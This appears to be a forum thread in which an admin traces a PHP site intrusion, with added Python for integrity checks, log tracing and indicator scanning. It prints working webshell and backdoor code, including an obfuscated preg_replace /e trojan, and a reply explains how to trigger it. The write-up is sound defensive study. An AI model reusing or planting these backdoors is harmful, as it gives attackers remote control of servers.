echo '<input type="button" onclick="cd(\''.ROOTDIR.'\');" style="width:68px;" value="根目录"> ';
echo '<input type="button" onclick="cd(\''.THISDIR.'\');" style="width:68px;" value="程序目录"> ';
echo '</form></div><div class="actall">';
echo '<input type="button" value="贱立文贱" onclick="nf(\'edit\',\'newfile.php\');" style="width:68px;"> ';
echo '<input type="button" value="贱立目录" onclick="txts(\'目录名\',\'newdir\',\'e\');" style="width:68px;"> ';
echo '<input type="button" value="下栽文贱" onclick="txts(\'下载文贱到当前目录\',\'http://www.baidu.com/cmd.exe\',\'f\');" style="width:68px;"> ';
echo '<input type="button" value="批量上船" onclick="go(\'upfiles\',\''.$nowdir.'\');" style="width:68px;"> ';
echo '<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">';
echo '<input type="hidden" name="rsv_t" id="rsv_t" value="'.$nowdir.'">';
echo '<input type="file" name="upfile" style="width:286px;height:21px;"> ';
echo '<input type="button" onclick="$(\'upfrm\').submit();" value="上船" style="width:50px;"> ';
echo '上船重命名为 <input type="text" name="rename" style="width:128px;">';
echo '</form></div>';
echo '<form name="frm1" id="frm1" method="POST"><table class="tables">';
echo '<input type="hidden" name="rsv_t" id="rsv_t" value="'.$nowdir.'">';
echo '<input type="hidden" name="act" id="act" value="">';
echo '<input type="hidden" name="var" id="var" value="">';
echo '<th><a href="javascript:cd(\''.dirname($nowdir).'/\');">上级目录</a></th><th style="width:8%">操作</th><th style="width:5%">属性</th><th style="width:17%">创建时间</th><th style="width:17%">修改时间</th><th style="width:8%">下载</th>';
if($array) {
    asort($array['dir']);
    asort($array['file']);
    $dnum = $fnum = 0;
    foreach($array['dir'] as $path => $name) {
        $prem = substr(decoct(fileperms($path)),-4);
        $ctime = date('Y-m-d H:i:s',filectime($path));
        $mtime = date('Y-m-d H:i:s',filemtime($path));
        echo '<tr>';

        echo '<td><a href="javascript:cd(\''.$nowdir.$name.'\');"><b>'.strtr($name,array('%27' => '\'','%22' => '"')).'</b></a></td>';
        echo '<td><a href="javascript:dels(\''.$name.'\');">删</a> ';
        echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');">重命名</a></td>';
        echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';
        echo '<td>'.$ctime.'</td>';
        echo '<td>'.$mtime.'</td>';
        echo '<td>-</td>';
        echo '</tr>';
        $dnum++;
    }
    foreach($array['file'] as $path => $name) {
        $prem = substr(decoct(fileperms($path)),-4);
        $ctime = date('Y-m-d H:i:s',filectime($path));
        $mtime = date('Y-m-d H:i:s',filemtime($path));
        $size = size(filesize($path));
        echo '<tr>';

        echo '<td><input type="checkbox" name="files[]" value="'.$name.'"><a target="_blank" href="'.$thisurl.$name.'">'.strtr($name,array('%27' => '\'','%22' => '"')).'</a></td>';
        echo '<td><a href="javascript:go(\'edit\',\''.$name.'\');">编辑</a> ';
        echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');">重命名</a></td>';
        echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';
        echo '<td>'.$ctime.'</td>';
        echo '<td>'.$mtime.'</td>';
        echo '<td align="right"><a href="javascript:go(\'down\',\''.$name.'\');">'.$size.'</a></td>';
        echo '</tr>';
        $fnum++;
    }
}
unset($array);
echo '</table>';
echo '<div class="actall" style="text-align:left;">';
echo '<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> ';
echo '<input type="button" value="复制" style="width:50px;" onclick=\'txts("复制路径","'.$nowdir.'","a");\'> ';
echo '<input type="button" value="删" style="width:50px;" onclick=\'dels("b");\'> ';
echo '<input type="button" value="属性" style="width:50px;" onclick=\'txts("属性值","0666","c");\'> ';
echo '<input type="button" value="时间" style="width:50px;" onclick=\'txts("修改时间","'.$mtime.'","d");\'> ';
echo '目录['.$dnum.'] - 文贱['.$fnum.'] - 属性['.$chmod.']</div></form>';
break;
}
```


See lines 5-8 of the source:
```php
if(md5($_SERVER['HTTP_USER_AGENT']."KT1ypIeARt")
!== 'e87a2b5341a27ccdeaafcc167d5f0f2f' ||
md5($_SERVER['HTTP_3CEJNPXWAXN']."KT1ypIeARt")
!=='9c2bc4cba0afbead32963d742bf5e665'){
    header("HTTP/1.1 404 Not Found");
    echo 'No input file specified.';exit();
}
```


The authentication is unusual: it checks HTTP_USER_AGENT and a custom HTTP_3CEJNPXWAXN header, each hashed with md5 together with a random salt, so the expected values cannot be recovered; I simply commented the check out to get into the page. Every keyword in the shell has been deliberately rewritten as a homophone, e.g.
> 文贱管理 (for 文件管理, file manager), 反谈端口 (反弹端口, reverse port), 执行密令 (执行命令, execute command), 执行PHP (execute PHP), 系统信息 (system info)

You have to admire the author's imagination. File 2 decodes by much the same routine as file 1, so I won't repeat it here.

- ## 0x04 Removing the backdoors


  The first job was to remove the backdoors and make sure no other trojan files remained. Two months ago I wrote a simple file integrity checker: it computes a hash of every file in the site and stores it, and on the next run compares against the previous hashes and outputs the lists of newly created, modified and deleted files. The source is here: https://github.com/xuerhuo/PhpFileMonitoring
Sure enough it turned up a strange file:
> /www/web/xxx/public_html/uc_server/data/avatar/000/02/01/03_avatar_etc.php

```php
<?php
@$args = 1;
@$arr=array("n;}$_POST[long_key];/*"=>"test");
@$arr1=array_flip($arr);
@$arr2 = $arr1[test];
@create_function('$args',$arr2);

```


??? I was baffled. Had a new upload 0day appeared??? Deleted it without a second thought.
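Added example of the integrity check described above, not the author's PhpFileMonitoring code: a baseline of SHA-256 hashes is taken, and the next snapshot is compared against it to print the same three lists (created, modified, deleted). The web root, file names and contents here are constructed for the demonstration.

```python
import hashlib
import os
import tempfile


def snapshot(root):
    """Map each file under root (path relative to root) to its SHA-256."""
    hashes = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            hashes[os.path.relpath(full, root)] = digest.hexdigest()
    return hashes


def diff_snapshots(old, new):
    """Compare a saved baseline with a fresh snapshot: the three lists the
    post's checker prints (created / modified / deleted), sorted."""
    return {
        "created": sorted(p for p in new if p not in old),
        "modified": sorted(p for p in new if p in old and old[p] != new[p]),
        "deleted": sorted(p for p in old if p not in new),
    }


def demo():
    """Constructed web root: take a baseline, then simulate what an intruder
    leaves behind (a dropped file, an edited file, a removed file)."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "uc_server/data/avatar/000/02/01"))
    for rel in ("index.php", "config/config_global.php"):
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("<?php // constructed clean file: " + rel)
    baseline = snapshot(root)  # in practice saved to disk between runs
    dropped = "uc_server/data/avatar/000/02/01/03_avatar_etc.php"
    with open(os.path.join(root, dropped), "w") as fh:
        fh.write("<?php // constructed stand-in for the dropped shell")
    with open(os.path.join(root, "index.php"), "a") as fh:
        fh.write("\n// constructed stand-in for injected code")
    os.remove(os.path.join(root, "config/config_global.php"))
    return diff_snapshots(baseline, snapshot(root))
```

The baseline must be stored outside the web root (or off the host), otherwise an intruder with write access can simply refresh it.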

- ## 0x05 Tracing the source & patching the hole
   
    First, filter all PHP requests out of the access log, because the log file was far too big:
```bash
cat www.xxx.com3.log | grep 'php' >> attack1803/xxx1803php.log
```

Search the access records for the three file names:
```bash
cat xxx1803php.log | grep -E 'uc_server/data/avatar/000/02/01/03_avatar_etc.php|source/plugin/dzapp_hd/module/hd_seyu.php|template/strong_say/touch/common/tools_ajax.php'
```
> 59.188.72.179 - - [02/Feb/2018:13:12:27 +0800] "GET /source/plugin/dzapp_hd/module/hd_seyu.php HTTP/1.1" 404 55 "http://www.xxx.com/xxxxxx/manage/assets/lib/webuploader/0.1.5/server/asczxc.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
> 59.188.72.179 - - [02/Feb/2018:13:19:16 +0800] "GET /template/strong_say/touch/common/tools_ajax.php HTTP/1.1" 404 55 "http://www.xxx.com/xxxxxx/manage/assets/lib/webuploader/0.1.5/server/asczxc.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
> 59.188.72.179 - - [02/Feb/2018:13:46:23 +0800] "GET /uc_server/data/avatar/000/02/01/03_avatar_etc.php HTTP/1.1" 200 31 "http://www.xxx.com/xxxxxx/manage/assets/lib/webuploader/0.1.5/server/asczxc.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
> 59.188.72.179 - - [02/Feb/2018:13:49:18 +0800] "GET /uc_server/data/avatar/000/02/01/03_avatar_etc.php HTTP/1.1" 200 31 "http://www.xxx.com/xxxxxx/manage/assets/lib/webuploader/0.1.5/server/asczxc.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"

Then search the access records by that IP:
```bash
cat xxx51803php.log |grep '59.188.72.179'
```

> 59.188.72.179 - - [02/Feb/2018:12:59:19 +0800] "GET /portal.php HTTP/1.1" 200 20531 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
> 59.188.72.179 - - [02/Feb/2018:13:01:44 +0800] "POST /xxxxxx/manage/assets/lib/webuploader/0.1.5/server/preview.php HTTP/1.1" 200 165 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
> 59.188.72.179 - - [02/Feb/2018:13:01:51 +0800] "POST /xxxxxx/manage/assets/lib/webuploader/0.1.5/server/preview/028bc33bdb3dba365682025c647585f4.php HTTP/1.1" 200 817 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2926.0 Safari/537.36"
> 59.188.72.179 - - [02/Feb/2018:13:02:10 +0800] "POST /xxxxxx/manage/assets/lib/webuploader/0.1.5/server/preview/028bc33bdb3dba365682025c647585f4.php HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2926.0 Safari/537.36"
> 59.188.72.179 - - [02/Feb/2018:13:02:16 +0800] "GET /xxxxxx/manage/assets/lib/webuploader/0.1.5/server/asczxc.php HTTP/1.1" 200 3234 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"

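The two grep steps above (hits on the known shell paths, then pivoting to every request from the same client to get the timeline that exposes the upload endpoint), written as an added example that is not part of the original post. The IP and paths come from the post; the log lines are constructed and abbreviated, with a second client added as noise.

```python
import re
from datetime import datetime

# Nginx/Apache combined log format; the user agent is shortened in the samples.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

SAMPLE_LOG = """\
10.0.0.5 - - [02/Feb/2018:12:58:00 +0800] "GET /portal.php HTTP/1.1" 200 20531 "-" "Mozilla/5.0"
59.188.72.179 - - [02/Feb/2018:12:59:19 +0800] "GET /portal.php HTTP/1.1" 200 20531 "-" "Mozilla/5.0"
59.188.72.179 - - [02/Feb/2018:13:01:44 +0800] "POST /xxxxxx/manage/assets/lib/webuploader/0.1.5/server/preview.php HTTP/1.1" 200 165 "-" "Mozilla/5.0"
59.188.72.179 - - [02/Feb/2018:13:02:16 +0800] "GET /xxxxxx/manage/assets/lib/webuploader/0.1.5/server/asczxc.php HTTP/1.1" 200 3234 "-" "Mozilla/5.0"
59.188.72.179 - - [02/Feb/2018:13:46:23 +0800] "GET /uc_server/data/avatar/000/02/01/03_avatar_etc.php HTTP/1.1" 200 31 "http://www.xxx.com/xxxxxx/manage/assets/lib/webuploader/0.1.5/server/asczxc.php" "Mozilla/5.0"
10.0.0.5 - - [02/Feb/2018:13:50:00 +0800] "GET /forum.php HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

# The three webshell paths identified in the post.
WEBSHELL_PATHS = {
    "/uc_server/data/avatar/000/02/01/03_avatar_etc.php",
    "/source/plugin/dzapp_hd/module/hd_seyu.php",
    "/template/strong_say/touch/common/tools_ajax.php",
}


def parse(text):
    """Parse combined-format lines; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            e = m.groupdict()
            e["time"] = datetime.strptime(e["time"], "%d/%b/%Y:%H:%M:%S %z")
            entries.append(e)
    return entries


def webshell_clients(entries):
    """Step 1: every client IP that requested one of the known shells."""
    return {e["ip"] for e in entries if e["path"].split("?")[0] in WEBSHELL_PATHS}


def timeline(entries, ips):
    """Step 2: all requests from those clients, oldest first. The entries that
    precede the first shell hit are where the initial upload shows up."""
    hits = sorted((e for e in entries if e["ip"] in ips), key=lambda e: e["time"])
    return [(e["time"].strftime("%H:%M:%S"), e["method"], e["path"], e["status"]) for e in hits]
```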

So the problem was in webuploader.
Following on from that, I found another trojan disguised as perfectly legitimate code, /kod/app/model/Kod.class.php:
```
<?php
if (isset($_POST["\x66\x6F\x72\x75\x6d"]) && isset($_POST["\x63\x68\x65\x63\x6b"]))
{
    $__PHP_debug   = array (
        'ZendName' => '66,6f,72,75,6d',   
        'ZendPort' => '63,68,65,63,6b',
        'ZendSalt' => '2bae0d0fd9be86ee648eecafc76dd608'
    );
    $__PHP_replace = array (
        pack('H*', join('', explode(',', $__PHP_debug['ZendName']))),
        pack('H*', join('', explode(',', $__PHP_debug['ZendPort']))),
        $__PHP_debug['ZendSalt']
    );
    $__PHP_request = &$_POST;
    $__PHP_token   = md5($__PHP_request[$__PHP_replace[0]]);
   
    if ($__PHP_token === $__PHP_replace[2])
    {
        $__PHP_token = preg_replace (
            chr(47).$__PHP_token.chr(47).chr(101),
            $__PHP_request[$__PHP_replace[1]],
            $__PHP_token
        );
        
        unset (
            $__PHP_debug,
            $__PHP_replace,
            $__PHP_request,
            $__PHP_token
        );
        
        if(!defined('_DEBUG_TOKEN')) exit ('Get token fail!');
    }
}
?>
```

Searching the logs turned up more backdoor trojans; they are attached at the end of the post.
> 59.188.72.179 - - [02/Feb/2018:14:41:06 +0800] "GET /xxxxxx/manage/assets/lib/webuploader/0.1.5/server/yinwenban.php?username=\***&db=\***&dump=pre_ucenter_members HTTP/1.1" 200 36222 "http://www.\***.com/xxxxxx/manage/assets/lib/webuploader/0.1.5/server/yinwenban.php?username=\***&db=\***&select=pre_ucenter_members" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"


They even dumped the database; this can be handed over to the cyber police.

- ## 0x06 Cleanup
Delete the known backdoors, extract keywords from the trojan files and search again.
```bash
find /wwwroot/xxx/public_html/ -type f -name '*.php'|xargs grep '\x66\x6F\x72\x75\x6d'
```

Delete each of the files the search turns up, one by one.
Update the integrity baseline, change the database password, remove the backdoor account from UCenter, extract and save the logs.
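The keyword search above, widened into a small indicator scan as an added example (not from the post): the patterns are drawn from the three shells shown earlier, namely literal hex-escaped strings like the `\x66\x6F...` superglobal keys, `preg_replace` with the `/e` modifier, `create_function`, and `eval` over a compressed base64 payload. The sample files are constructed, abbreviated look-alikes; note that Kod.class.php builds its `/e` pattern from `chr(47)` and `chr(101)`, so only the hex-escape indicator catches it.

```python
import os
import re
import tempfile

INDICATORS = {
    "hex_escaped_string": re.compile(r"(\\x[0-9A-Fa-f]{2}){4,}"),
    "preg_replace_e": re.compile(r"preg_replace\s*\(\s*['\"]/.*?/[a-zA-Z]*e[a-zA-Z]*['\"]"),
    "create_function": re.compile(r"create_function\s*\("),
    "eval_decoded_payload": re.compile(r"eval\s*\(\s*(gzuncompress|gzinflate|base64_decode)\s*\("),
}


def scan_file(path):
    """Names of the indicators that match the file's source, sorted."""
    with open(path, "r", errors="replace") as fh:
        src = fh.read()
    return sorted(name for name, rx in INDICATORS.items() if rx.search(src))


def scan_tree(root):
    """Return {relative path: [indicators]} for every .php file with a hit."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings


# Constructed, abbreviated stand-ins for the shells in the post plus one clean file.
SAMPLES = {
    "app/model/Kod.class.php": '<?php if (isset($_POST["\\x66\\x6F\\x72\\x75\\x6d"])) { echo 1; }',
    "avatar/03_avatar_etc.php": "<?php @create_function('$args', $arr2);",
    "tools_ajax.php": "<?php preg_replace(\"/.*/e\", \"eval(gzuncompress(base64_decode('x')));\", \".\");",
    "index.php": '<?php echo "clean"; ?>',
}


def demo():
    root = tempfile.mkdtemp()
    for rel, body in SAMPLES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return scan_tree(root)
```

Treat hits as candidates for manual review, not as a verdict: obfuscation like the `$SQPq` name-splitting in file 1 defeats any fixed pattern, which is why the integrity baseline remains the primary control.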

- ## 0x07 Summary
My feeling is that logs and integrity checking are the key things, and extremely important. Last time I ran into black-hat SEO; their tactic was to upload several hidden trojans, and without integrity checking it is very hard to find every backdoor. Some trojan samples are attached at the end of the post.

大圣 posted on 2018-3-31 10:19:07

Clear reasoning, learned something.
80uncle posted on 2018-4-1 23:34:49

Didn't you find out how they got in? Through a backdoor left earlier?
If you don't have file hashes, you can use ctime to look for recently changed files.
许繁 (OP) posted on 2018-4-2 00:27:19

RE: A traceback after getting pwned

80uncle posted on 2018-4-1 23:34
Didn't you find out how they got in? Through a backdoor left earlier?
If you don't have file hashes, you can use ctime to look for recently changed files.

One component had an upload vulnerability; that must be where it happened. The site had not been compromised before.

Rebith posted on 2018-4-7 17:45:00

Leaving a comment to bookmark this. Impressive, will read again.
含泪的微笑 posted on 2018-4-13 09:54:51

/kod/app/model/Kod.class.php   I don't understand how you connect to this trojan.
许繁 (OP) posted on 2018-4-13 21:54:24

RE: A traceback after getting pwned

含泪的微笑 posted on 2018-4-13 09:54
/kod/app/model/Kod.class.php   I don't understand how you connect to this trojan.

```php
$__PHP_token = preg_replace (
    chr(47).$__PHP_token.chr(47).chr(101),
    $__PHP_request[$__PHP_replace[1]],
    $__PHP_token
);
```

chr(101) is the e modifier; preg_replace executes the code that is passed in.


zjkuabjt posted on 2018-4-17 22:31:20

Nice, very detailed write-up, impressive!
ring0ne posted on 2018-4-18 10:53:22

Learned something, good share.
大饭刚 posted on 2018-4-18 11:19:22

That trojan is way too strong.. a noob like me can't follow it.
Aimuer posted on 2018-4-20 14:47:18

What on earth is 安骑士?